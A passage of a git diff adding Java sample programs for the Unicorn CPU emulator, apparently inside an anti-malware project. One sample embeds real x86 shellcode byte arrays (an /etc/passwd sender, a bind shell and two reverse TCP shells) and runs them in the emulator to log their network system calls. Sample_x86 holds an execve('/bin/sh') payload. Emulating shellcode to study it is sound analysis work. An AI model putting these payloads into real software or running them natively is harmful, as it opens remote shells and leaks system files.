{106,102,88,106,1,91,49,-10,86,83,106,2,-119,-31,-51,-128,95,-105,-109,-80,102,86,102,104,5,57,102,83,-119,-31,106,16,81,87,-119,-31,-51,-128,-80,102,-77,4,86,87,-119,-31,-51,-128,-80,102,67,86,86,87,-119,-31,-51,-128,89,89,-79,2,-109,-80,63,-51,-128,73,121,-7,-80,11,104,47,47,115,104,104,47,98,105,110,-119,-29,65,-119,-54,-51,-128}; +// http://shell-storm.org/shellcode/files/shellcode-883.php + public static final byte[] X86_REVERSE_TCP = {106,102,88,106,1,91,49,-46,82,83,106,2,-119,-31,-51,-128,-110,-80,102,104,127,1,1,1,102,104,5,57,67,102,83,-119,-31,106,16,81,82,-119,-31,67,-51,-128,106,2,89,-121,-38,-80,63,-51,-128,73,121,-7,-80,11,65,-119,-54,82,104,47,47,115,104,104,47,98,105,110,-119,-29,-51,-128}; 
+// http://shell-storm.org/shellcode/files/shellcode-849.php + public static final byte[] X86_REVERSE_TCP_2 = {49,-64,49,-37,49,-55,49,-46,-80,102,-77,1,81,106,6,106,1,106,2,-119,-31,-51,-128,-119,-58,-80,102,49,-37,-77,2,104,-64,-88,1,10,102,104,122,105,102,83,-2,-61,-119,-31,106,16,81,86,-119,-31,-51,-128,49,-55,-79,3,-2,-55,-80,63,-51,-128,117,-8,49,-64,82,104,110,47,115,104,104,47,47,98,105,-119,-29,82,83,-119,-31,82,-119,-30,-80,11,-51,-128}; + + // memory address where emulation starts + public static final int ADDRESS = 0x1000000; + + public static String join(ArrayList l, String sep) { + boolean first = true; + StringBuilder res = new StringBuilder(); + for (String s : l) { + if (!first) { + res.append(sep); + } + res.append(s); + first = false; + } + return res.toString(); + } + + private static class LogChain { + public Hashtable> __chains = new Hashtable>(); + public Hashtable> __linking_fds = new Hashtable>(); + + public void clean() { + __chains.clear(); + __linking_fds.clear(); + } + + public void create_chain(long id) { + if (!__chains.containsKey(id)) { + __chains.put(id, new ArrayList()); + } + else { + System.out.printf("LogChain: id %d existed\n", id); + } + } + + public void add_log(long id, String msg) { + long fd = get_original_fd(id); + + if (fd != -1) { + __chains.get(fd).add(msg); + } + else { + System.out.printf("LogChain: id %d doesn't exist\n", id); + } + } + + public void link_fd(long from_fd, long to_fd) { + if (!__linking_fds.containsKey(to_fd)) { + __linking_fds.put(to_fd, new ArrayList()); + } + + __linking_fds.get(to_fd).add(from_fd); + } + + public long get_original_fd(long fd) { + if (__chains.containsKey(fd)) { + return fd; + } + + for (Long orig_fd : __linking_fds.keySet()) { + if (__linking_fds.get(orig_fd).contains(fd)) + return orig_fd; + } + return -1; + } + + public void print_report() { + System.out.printf("\n----------------"); + System.out.printf("\n| START REPORT |"); + System.out.printf("\n----------------\n\n"); + 
for (Long fd : __chains.keySet()) { + System.out.printf("---- START FD(%d) ----\n", fd); + System.out.println(join(__chains.get(fd), "\n")); + System.out.printf("---- END FD(%d) ----\n", fd); + } + System.out.printf("\n--------------"); + System.out.printf("\n| END REPORT |"); + System.out.printf("\n--------------\n\n"); + } + } + // end supported classes + + // utilities + static String read_string(Unicorn uc, long addr) { + StringBuilder ret = new StringBuilder(); + char c; + do { + c = (char)(uc.mem_read(addr++, 1)[0] & 0xff); + if (c != 0) { + ret.append(c); + } + } while (c != 0); + + return ret.toString(); + } + + static String parse_sock_address(byte[] sock_addr) { + int sin_family = ((sock_addr[0] & 0xff) + (sock_addr[1] << 8)) & 0xffff; + + if (sin_family == 2) { // AF_INET + int sin_port = ((sock_addr[3] & 0xff) + (sock_addr[2] << 8)) & 0xffff; + return String.format("%d.%d.%d.%d:%d", sock_addr[4] & 0xff, sock_addr[5] & 0xff, sock_addr[6] & 0xff, sock_addr[7] & 0xff, sin_port); + } + else if (sin_family == 6) // AF_INET6 + return ""; + return null; + } + + static void print_sockcall(String msg) { + System.out.printf(">>> SOCKCALL %s\n", msg); + } + // end utilities + + static void test_i386(byte[] code) { + fd_chains.clean(); + System.out.printf("Emulate i386 code\n"); + try { + // Initialize emulator in X86-32bit mode + Unicorn mu = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_32); + + // map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); + + // write machine code to be emulated to memory + mu.mem_write(ADDRESS, code); + + // initialize stack + mu.reg_write(Unicorn.UC_X86_REG_ESP, new Long(ADDRESS + 0x200000)); + + // handle interrupt ourself + mu.hook_add(new MyInterruptHook(), null); + + // emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + code.length, 0, 0); + + // now print out some registers + System.out.printf(">>> Emulation done\n"); + + } catch (UnicornException uex) { + 
System.out.printf("ERROR: %s\n", uex.getMessage()); + } + + fd_chains.print_report(); + } + + public static void main(String args[]) { + test_i386(X86_SEND_ETCPASSWD); + test_i386(X86_BIND_TCP); + test_i386(X86_REVERSE_TCP); + test_i386(X86_REVERSE_TCP_2); + } + +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Sample_arm.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Sample_arm.java new file mode 100644 index 0000000..a4bd195 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Sample_arm.java @@ -0,0 +1,130 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh, 2015 */ + +/* Sample code to demonstrate how to emulate ARM code */ + +import unicorn.*; + +public class Sample_arm { + + // code to be emulated + public static final byte[] ARM_CODE = {55,0,(byte)0xa0,(byte)0xe3,3,16,66,(byte)0xe0}; // mov r0, #0x37; sub r1, r2, r3 + public static final byte[] THUMB_CODE = {(byte)0x83, (byte)0xb0}; // sub sp, #0xc + + // memory address where emulation starts + public static final int ADDRESS = 0x10000; + + public static final long toInt(byte val[]) { + long res = 0; + for (int i = 0; i < val.length; i++) { + long v = val[i] & 0xff; + res = res + (v << (i * 8)); + } + return res; + } + + private static class MyBlockHook implements BlockHook { + public void hook(Unicorn u, long address, int size, Object user_data) + { + System.out.print(String.format(">>> Tracing basic block at 0x%x, block size = 0x%x\n", address, size)); + } + } + + // callback for tracing instruction + private static class MyCodeHook implements CodeHook { + public void hook(Unicorn u, long address, int size, Object user_data) { + System.out.print(String.format(">>> Tracing instruction at 0x%x, instruction size = 0x%x\n", address, size)); + } + } + + static void test_arm() + { + + Long r0 = new Long(0x1234); // R0 register + Long r2 = new Long(0x6789); // R1 register + Long r3 = new Long(0x3333); // R2 register + Long r1; // R1 
register + + System.out.print("Emulate ARM code\n"); + + // Initialize emulator in ARM mode + Unicorn u = new Unicorn(Unicorn.UC_ARCH_ARM, Unicorn.UC_MODE_ARM); + + // map 2MB memory for this emulation + u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); + + // write machine code to be emulated to memory + u.mem_write(ADDRESS, ARM_CODE); + + // initialize machine registers + u.reg_write(Unicorn.UC_ARM_REG_R0, r0); + u.reg_write(Unicorn.UC_ARM_REG_R2, r2); + u.reg_write(Unicorn.UC_ARM_REG_R3, r3); + + // tracing all basic blocks with customized callback + u.hook_add(new MyBlockHook(), 1, 0, null); + + // tracing one instruction at ADDRESS with customized callback + u.hook_add(new MyCodeHook(), ADDRESS, ADDRESS, null); + + // emulate machine code in infinite time (last param = 0), or when + // finishing all the code. + u.emu_start(ADDRESS, ADDRESS + ARM_CODE.length, 0, 0); + + // now print out some registers + System.out.print(">>> Emulation done. Below is the CPU context\n"); + + r0 = (Long)u.reg_read(Unicorn.UC_ARM_REG_R0); + r1 = (Long)u.reg_read(Unicorn.UC_ARM_REG_R1); + System.out.print(String.format(">>> R0 = 0x%x\n", r0.intValue())); + System.out.print(String.format(">>> R1 = 0x%x\n", r1.intValue())); + + u.close(); + } + + static void test_thumb() + { + + Long sp = new Long(0x1234); // R0 register + + System.out.print("Emulate THUMB code\n"); + + // Initialize emulator in ARM mode + Unicorn u = new Unicorn(Unicorn.UC_ARCH_ARM, Unicorn.UC_MODE_THUMB); + + // map 2MB memory for this emulation + u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); + + // write machine code to be emulated to memory + u.mem_write(ADDRESS, THUMB_CODE); + + // initialize machine registers + u.reg_write(Unicorn.UC_ARM_REG_SP, sp); + + // tracing all basic blocks with customized callback + u.hook_add(new MyBlockHook(), 1, 0, null); + + // tracing one instruction at ADDRESS with customized callback + u.hook_add(new MyCodeHook(), ADDRESS, ADDRESS, null); + + // emulate 
machine code in infinite time (last param = 0), or when + // finishing all the code. + u.emu_start(ADDRESS | 1, ADDRESS + THUMB_CODE.length, 0, 0); + + // now print out some registers + System.out.print(">>> Emulation done. Below is the CPU context\n"); + + sp = (Long)u.reg_read(Unicorn.UC_ARM_REG_SP); + System.out.print(String.format(">>> SP = 0x%x\n", sp.intValue())); + + u.close(); + } + + public static void main(String args[]) + { + test_arm(); + System.out.print("==========================\n"); + test_thumb(); + } + +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Sample_arm64.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Sample_arm64.java new file mode 100644 index 0000000..56a7212 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Sample_arm64.java @@ -0,0 +1,115 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
+ +*/ + +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh, 2015 */ + +/* Sample code to demonstrate how to emulate ARM64 code */ + +import unicorn.*; + +public class Sample_arm64 { + + // code to be emulated + public static final byte[] ARM_CODE = {-85,1,15,-117}; // add x11, x13, x15 + + // memory address where emulation starts + public static final int ADDRESS = 0x10000; + + public static final long toInt(byte val[]) { + long res = 0; + for (int i = 0; i < val.length; i++) { + long v = val[i] & 0xff; + res = res + (v << (i * 8)); + } + return res; + } + + public static final byte[] toBytes(long val) { + byte[] res = new byte[8]; + for (int i = 0; i < 8; i++) { + res[i] = (byte)(val & 0xff); + val >>>= 8; + } + return res; + } + + // callback for tracing basic blocks + private static class MyBlockHook implements BlockHook { + public void hook(Unicorn u, long address, int size, Object user_data) { + System.out.print(String.format(">>> Tracing basic block at 0x%x, block size = 0x%x\n", address, size)); + } + } + + // callback for tracing instruction + private static class MyCodeHook implements CodeHook { + public void hook(Unicorn u, long address, int size, Object user_data) { + System.out.print(String.format(">>> Tracing instruction at 0x%x, instruction size = 0x%x\n", address, size)); + } + } + + static void test_arm64() + { + + Long x11 = new Long(0x1234); // X11 register + Long x13 = new Long(0x6789); // X13 register + Long x15 = new Long(0x3333); // X15 register + + System.out.print("Emulate ARM64 code\n"); + + // Initialize emulator in ARM mode + Unicorn u = new Unicorn(Unicorn.UC_ARCH_ARM64, Unicorn.UC_MODE_ARM); + + // map 2MB memory for this emulation + u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); + + // write machine code to be emulated to memory + u.mem_write(ADDRESS, ARM_CODE); + + // initialize machine registers + u.reg_write(Unicorn.UC_ARM64_REG_X11, x11); + u.reg_write(Unicorn.UC_ARM64_REG_X13, x13); + 
u.reg_write(Unicorn.UC_ARM64_REG_X15, x15); + + // tracing all basic blocks with customized callback + u.hook_add(new MyBlockHook(), 1, 0, null); + + // tracing one instruction at ADDRESS with customized callback + u.hook_add(new MyCodeHook(), ADDRESS, ADDRESS, null); + + // emulate machine code in infinite time (last param = 0), or when + // finishing all the code. + u.emu_start(ADDRESS, ADDRESS + ARM_CODE.length, 0, 0); + + // now print out some registers + System.out.print(">>> Emulation done. Below is the CPU context\n"); + + x11 = (Long)u.reg_read(Unicorn.UC_ARM64_REG_X11); + System.out.print(String.format(">>> X11 = 0x%x\n", x11.longValue())); + + u.close(); + } + + public static void main(String args[]) + { + test_arm64(); + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Sample_m68k.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Sample_m68k.java new file mode 100644 index 0000000..cae025a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Sample_m68k.java @@ -0,0 +1,177 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
+ +*/ + +/* Unicorn Emulator Engine */ +/* By Loi Anh Tuan, 2015 */ + +/* Sample code to demonstrate how to emulate m68k code */ + +import unicorn.*; + +public class Sample_m68k { + + // code to be emulated + public static final byte[] M68K_CODE = {118,-19}; // movq #-19, %d3 + + // memory address where emulation starts + public static final int ADDRESS = 0x10000; + + public static final long toInt(byte val[]) { + long res = 0; + for (int i = 0; i < val.length; i++) { + long v = val[i] & 0xff; + res = res + (v << (i * 8)); + } + return res; + } + + public static final byte[] toBytes(long val) { + byte[] res = new byte[8]; + for (int i = 0; i < 8; i++) { + res[i] = (byte)(val & 0xff); + val >>>= 8; + } + return res; + } + + // callback for tracing basic blocks + private static class MyBlockHook implements BlockHook { + public void hook(Unicorn u, long address, int size, Object user_data) { + System.out.print(String.format(">>> Tracing basic block at 0x%x, block size = 0x%x\n", address, size)); + } + } + + // callback for tracing instruction + private static class MyCodeHook implements CodeHook { + public void hook(Unicorn u, long address, int size, Object user_data) { + System.out.print(String.format(">>> Tracing instruction at 0x%x, instruction size = 0x%x\n", address, size)); + } + } + + static void test_m68k() + { + Long d0 = new Long(0x0000); // d0 data register + Long d1 = new Long(0x0000); // d1 data register + Long d2 = new Long(0x0000); // d2 data register + Long d3 = new Long(0x0000); // d3 data register + Long d4 = new Long(0x0000); // d4 data register + Long d5 = new Long(0x0000); // d5 data register + Long d6 = new Long(0x0000); // d6 data register + Long d7 = new Long(0x0000); // d7 data register + + Long a0 = new Long(0x0000); // a0 address register + Long a1 = new Long(0x0000); // a1 address register + Long a2 = new Long(0x0000); // a2 address register + Long a3 = new Long(0x0000); // a3 address register + Long a4 = new Long(0x0000); // a4 address 
register + Long a5 = new Long(0x0000); // a5 address register + Long a6 = new Long(0x0000); // a6 address register + Long a7 = new Long(0x0000); // a6 address register + + Long pc = new Long(0x0000); // program counter + Long sr = new Long(0x0000); // status register + + System.out.print("Emulate M68K code\n"); + + // Initialize emulator in M68K mode + Unicorn u = new Unicorn(Unicorn.UC_ARCH_M68K, Unicorn.UC_MODE_BIG_ENDIAN); + + // map 2MB memory for this emulation + u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); + + // write machine code to be emulated to memory + u.mem_write(ADDRESS, M68K_CODE); + + // initialize machine registers + u.reg_write(Unicorn.UC_M68K_REG_D0, d0); + u.reg_write(Unicorn.UC_M68K_REG_D1, d1); + u.reg_write(Unicorn.UC_M68K_REG_D2, d2); + u.reg_write(Unicorn.UC_M68K_REG_D3, d3); + u.reg_write(Unicorn.UC_M68K_REG_D4, d4); + u.reg_write(Unicorn.UC_M68K_REG_D5, d5); + u.reg_write(Unicorn.UC_M68K_REG_D6, d6); + u.reg_write(Unicorn.UC_M68K_REG_D7, d7); + + u.reg_write(Unicorn.UC_M68K_REG_A0, a0); + u.reg_write(Unicorn.UC_M68K_REG_A1, a1); + u.reg_write(Unicorn.UC_M68K_REG_A2, a2); + u.reg_write(Unicorn.UC_M68K_REG_A3, a3); + u.reg_write(Unicorn.UC_M68K_REG_A4, a4); + u.reg_write(Unicorn.UC_M68K_REG_A5, a5); + u.reg_write(Unicorn.UC_M68K_REG_A6, a6); + u.reg_write(Unicorn.UC_M68K_REG_A7, a7); + + u.reg_write(Unicorn.UC_M68K_REG_PC, pc); + u.reg_write(Unicorn.UC_M68K_REG_SR, sr); + + // tracing all basic blocks with customized callback + u.hook_add(new MyBlockHook(), 1, 0, null); + + // tracing all instruction + u.hook_add(new MyCodeHook(), 1, 0, null); + + // emulate machine code in infinite time (last param = 0), or when + // finishing all the code. + u.emu_start(ADDRESS, ADDRESS + M68K_CODE.length, 0, 0); + + // now print out some registers + System.out.print(">>> Emulation done. 
Below is the CPU context\n"); + + d0 = (Long)u.reg_read(Unicorn.UC_M68K_REG_D0); + d1 = (Long)u.reg_read(Unicorn.UC_M68K_REG_D1); + d2 = (Long)u.reg_read(Unicorn.UC_M68K_REG_D2); + d3 = (Long)u.reg_read(Unicorn.UC_M68K_REG_D3); + d4 = (Long)u.reg_read(Unicorn.UC_M68K_REG_D4); + d5 = (Long)u.reg_read(Unicorn.UC_M68K_REG_D5); + d6 = (Long)u.reg_read(Unicorn.UC_M68K_REG_D6); + d7 = (Long)u.reg_read(Unicorn.UC_M68K_REG_D7); + + a0 = (Long)u.reg_read(Unicorn.UC_M68K_REG_A0); + a1 = (Long)u.reg_read(Unicorn.UC_M68K_REG_A1); + a2 = (Long)u.reg_read(Unicorn.UC_M68K_REG_A2); + a3 = (Long)u.reg_read(Unicorn.UC_M68K_REG_A3); + a4 = (Long)u.reg_read(Unicorn.UC_M68K_REG_A4); + a5 = (Long)u.reg_read(Unicorn.UC_M68K_REG_A5); + a6 = (Long)u.reg_read(Unicorn.UC_M68K_REG_A6); + a7 = (Long)u.reg_read(Unicorn.UC_M68K_REG_A7); + + pc = (Long)u.reg_read(Unicorn.UC_M68K_REG_PC); + sr = (Long)u.reg_read(Unicorn.UC_M68K_REG_SR); + + System.out.print(String.format(">>> A0 = 0x%x\t\t>>> D0 = 0x%x\n", a0.intValue(), d0.intValue())); + System.out.print(String.format(">>> A1 = 0x%x\t\t>>> D1 = 0x%x\n", a1.intValue(), d1.intValue())); + System.out.print(String.format(">>> A2 = 0x%x\t\t>>> D2 = 0x%x\n", a2.intValue(), d2.intValue())); + System.out.print(String.format(">>> A3 = 0x%x\t\t>>> D3 = 0x%x\n", a3.intValue(), d3.intValue())); + System.out.print(String.format(">>> A4 = 0x%x\t\t>>> D4 = 0x%x\n", a4.intValue(), d4.intValue())); + System.out.print(String.format(">>> A5 = 0x%x\t\t>>> D5 = 0x%x\n", a5.intValue(), d5.intValue())); + System.out.print(String.format(">>> A6 = 0x%x\t\t>>> D6 = 0x%x\n", a6.intValue(), d6.intValue())); + System.out.print(String.format(">>> A7 = 0x%x\t\t>>> D7 = 0x%x\n", a7.intValue(), d7.intValue())); + System.out.print(String.format(">>> PC = 0x%x\n", pc.intValue())); + System.out.print(String.format(">>> SR = 0x%x\n", sr.intValue())); + + u.close(); + } + + public static void main(String args[]) + { + test_m68k(); + } +} diff --git 
a/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Sample_mips.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Sample_mips.java new file mode 100644 index 0000000..d977c23 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Sample_mips.java @@ -0,0 +1,151 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
+ +*/ + +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh, 2015 */ + +/* Sample code to demonstrate how to emulate Mips code (big endian) */ + +import unicorn.*; + +public class Sample_mips { + + // code to be emulated + public static final byte[] MIPS_CODE_EB = {52,33,52,86}; + public static final byte[] MIPS_CODE_EL = {86,52,33,52}; + + // memory address where emulation starts + public static final int ADDRESS = 0x10000; + + public static final long toInt(byte val[]) { + long res = 0; + for (int i = 0; i < val.length; i++) { + long v = val[i] & 0xff; + res = res + (v << (i * 8)); + } + return res; + } + + public static final byte[] toBytes(long val) { + byte[] res = new byte[8]; + for (int i = 0; i < 8; i++) { + res[i] = (byte)(val & 0xff); + val >>>= 8; + } + return res; + } + + // callback for tracing basic blocks + private static class MyBlockHook implements BlockHook { + public void hook(Unicorn u, long address, int size, Object user_data) { + System.out.print(String.format(">>> Tracing basic block at 0x%x, block size = 0x%x\n", address, size)); + } + } + + // callback for tracing instruction + private static class MyCodeHook implements CodeHook { + public void hook(Unicorn u, long address, int size, Object user_data) { + System.out.print(String.format(">>> Tracing instruction at 0x%x, instruction size = 0x%x\n", address, size)); + } + } + + static void test_mips_eb() + { + + Long r1 = new Long(0x6789); // R1 register + + System.out.print("Emulate MIPS code (big-endian)\n"); + + // Initialize emulator in MIPS mode + Unicorn u = new Unicorn(Unicorn.UC_ARCH_MIPS, Unicorn.UC_MODE_MIPS32 + Unicorn.UC_MODE_BIG_ENDIAN); + + // map 2MB memory for this emulation + u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); + + // write machine code to be emulated to memory + u.mem_write(ADDRESS, MIPS_CODE_EB); + + // initialize machine registers + u.reg_write(Unicorn.UC_MIPS_REG_1, r1); + + // tracing all basic blocks with customized callback + u.hook_add(new 
MyBlockHook(), 1, 0, null); + + // tracing one instruction at ADDRESS with customized callback + u.hook_add(new MyCodeHook(), ADDRESS, ADDRESS, null); + + // emulate machine code in infinite time (last param = 0), or when + // finishing all the code. + u.emu_start(ADDRESS, ADDRESS + MIPS_CODE_EB.length, 0, 0); + + // now print out some registers + System.out.print(">>> Emulation done. Below is the CPU context\n"); + + r1 = (Long)u.reg_read(Unicorn.UC_MIPS_REG_1); + System.out.print(String.format(">>> R1 = 0x%x\n", r1.intValue())); + + u.close(); + } + + static void test_mips_el() + { + Long r1 = new Long(0x6789); // R1 register + + System.out.print("===========================\n"); + System.out.print("Emulate MIPS code (little-endian)\n"); + + // Initialize emulator in MIPS mode + Unicorn u = new Unicorn(Unicorn.UC_ARCH_MIPS, Unicorn.UC_MODE_MIPS32 + Unicorn.UC_MODE_LITTLE_ENDIAN); + + // map 2MB memory for this emulation + u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); + + // write machine code to be emulated to memory + u.mem_write(ADDRESS, MIPS_CODE_EL); + + // initialize machine registers + u.reg_write(Unicorn.UC_MIPS_REG_1, r1); + + // tracing all basic blocks with customized callback + u.hook_add(new MyBlockHook(), 1, 0, null); + + // tracing one instruction at ADDRESS with customized callback + u.hook_add(new MyCodeHook(), ADDRESS, ADDRESS, null); + + // emulate machine code in infinite time (last param = 0), or when + // finishing all the code. + u.emu_start(ADDRESS, ADDRESS + MIPS_CODE_EL.length, 0, 0); + + // now print out some registers + System.out.print(">>> Emulation done. 
Below is the CPU context\n"); + + r1 = (Long)u.reg_read(Unicorn.UC_MIPS_REG_1); + System.out.print(String.format(">>> R1 = 0x%x\n", r1.intValue())); + + u.close(); + } + + public static void main(String args[]) + { + test_mips_eb(); + test_mips_el(); + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Sample_sparc.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Sample_sparc.java new file mode 100644 index 0000000..85d2636 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Sample_sparc.java @@ -0,0 +1,115 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
+ +*/ + +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh, 2015 */ + +/* Sample code to demonstrate how to emulate Sparc code */ + +import unicorn.*; + +public class Sample_sparc { + + // code to be emulated + public static final byte[] SPARC_CODE = {-122,0,64,2}; + //public static final byte[] SPARC_CODE = {-69,112,0,0}; //illegal code + + // memory address where emulation starts + public static final int ADDRESS = 0x10000; + + public static final long toInt(byte val[]) { + long res = 0; + for (int i = 0; i < val.length; i++) { + long v = val[i] & 0xff; + res = res + (v << (i * 8)); + } + return res; + } + + public static final byte[] toBytes(long val) { + byte[] res = new byte[8]; + for (int i = 0; i < 8; i++) { + res[i] = (byte)(val & 0xff); + val >>>= 8; + } + return res; + } + + // callback for tracing basic blocks + private static class MyBlockHook implements BlockHook { + public void hook(Unicorn u, long address, int size, Object user_data) { + System.out.print(String.format(">>> Tracing basic block at 0x%x, block size = 0x%x\n", address, size)); + } + } + + // callback for tracing instruction + private static class MyCodeHook implements CodeHook { + public void hook(Unicorn u, long address, int size, Object user_data) { + System.out.print(String.format(">>> Tracing instruction at 0x%x, instruction size = 0x%x\n", address, size)); + } + } + + static void test_sparc() + { + Long g1 = new Long(0x1230); // G1 register + Long g2 = new Long(0x6789); // G2 register + Long g3 = new Long(0x5555); // G3 register + + System.out.print("Emulate SPARC code\n"); + + // Initialize emulator in Sparc mode + Unicorn u = new Unicorn(Unicorn.UC_ARCH_SPARC, Unicorn.UC_MODE_32 + Unicorn.UC_MODE_BIG_ENDIAN); + + // map 2MB memory for this emulation + u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); + + // write machine code to be emulated to memory + u.mem_write(ADDRESS, SPARC_CODE); + + // initialize machine registers + u.reg_write(Unicorn.UC_SPARC_REG_G1, g1); + 
u.reg_write(Unicorn.UC_SPARC_REG_G2, g2); + u.reg_write(Unicorn.UC_SPARC_REG_G3, g3); + + // tracing all basic blocks with customized callback + u.hook_add(new MyBlockHook(), 1, 0, null); + + // tracing one instruction at ADDRESS with customized callback + u.hook_add(new MyCodeHook(), ADDRESS, ADDRESS, null); + + // emulate machine code in infinite time (last param = 0), or when + // finishing all the code. + u.emu_start(ADDRESS, ADDRESS + SPARC_CODE.length, 0, 0); + + // now print out some registers + System.out.print(">>> Emulation done. Below is the CPU context\n"); + + g3 = (Long)u.reg_read(Unicorn.UC_SPARC_REG_G3); + System.out.print(String.format(">>> G3 = 0x%x\n", g3.intValue())); + + u.close(); + } + + public static void main(String args[]) + { + test_sparc(); + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Sample_x86.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Sample_x86.java new file mode 100644 index 0000000..e25df64 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Sample_x86.java @@ -0,0 +1,669 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
+ +*/ + +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh & Dang Hoang Vu, 2015 */ + +/* Sample code to demonstrate how to emulate X86 code */ + +import unicorn.*; + +public class Sample_x86 { + + // code to be emulated + public static final byte[] X86_CODE32 = {65,74}; + public static final byte[] X86_CODE32_JUMP = {-21,2,-112,-112,-112,-112,-112,-112}; + public static final byte[] X86_CODE32_SELF = {-21,28,90,-119,-42,-117,2,102,61,-54,125,117,6,102,5,3,3,-119,2,-2,-62,61,65,65,65,65,117,-23,-1,-26,-24,-33,-1,-1,-1,49,-46,106,11,88,-103,82,104,47,47,115,104,104,47,98,105,110,-119,-29,82,83,-119,-31,-54,125,65,65,65,65}; + public static final byte[] X86_CODE32_LOOP = {65,74,-21,-2}; + public static final byte[] X86_CODE32_MEM_WRITE = {-119,13,-86,-86,-86,-86,65,74}; + public static final byte[] X86_CODE32_MEM_READ = {-117,13,-86,-86,-86,-86,65,74}; + public static final byte[] X86_CODE32_JMP_INVALID = {-23,-23,-18,-18,-18,65,74}; + public static final byte[] X86_CODE32_INOUT = {65,-28,63,74,-26,70,67}; + public static final byte[] X86_CODE64 = {65,-68,59,-80,40,42,73,15,-55,-112,77,15,-83,-49,73,-121,-3,-112,72,-127,-46,-118,-50,119,53,72,-9,-39,77,41,-12,73,-127,-55,-10,-118,-58,83,77,-121,-19,72,15,-83,-46,73,-9,-44,72,-9,-31,77,25,-59,77,-119,-59,72,-9,-42,65,-72,79,-115,107,89,77,-121,-48,104,106,30,9,60,89}; + public static final byte[] X86_CODE16 = {0, 0}; // add byte ptr [bx + si], al + + // memory address where emulation starts + public static final int ADDRESS = 0x1000000; + + public static final long toInt(byte val[]) { + long res = 0; + for (int i = 0; i < 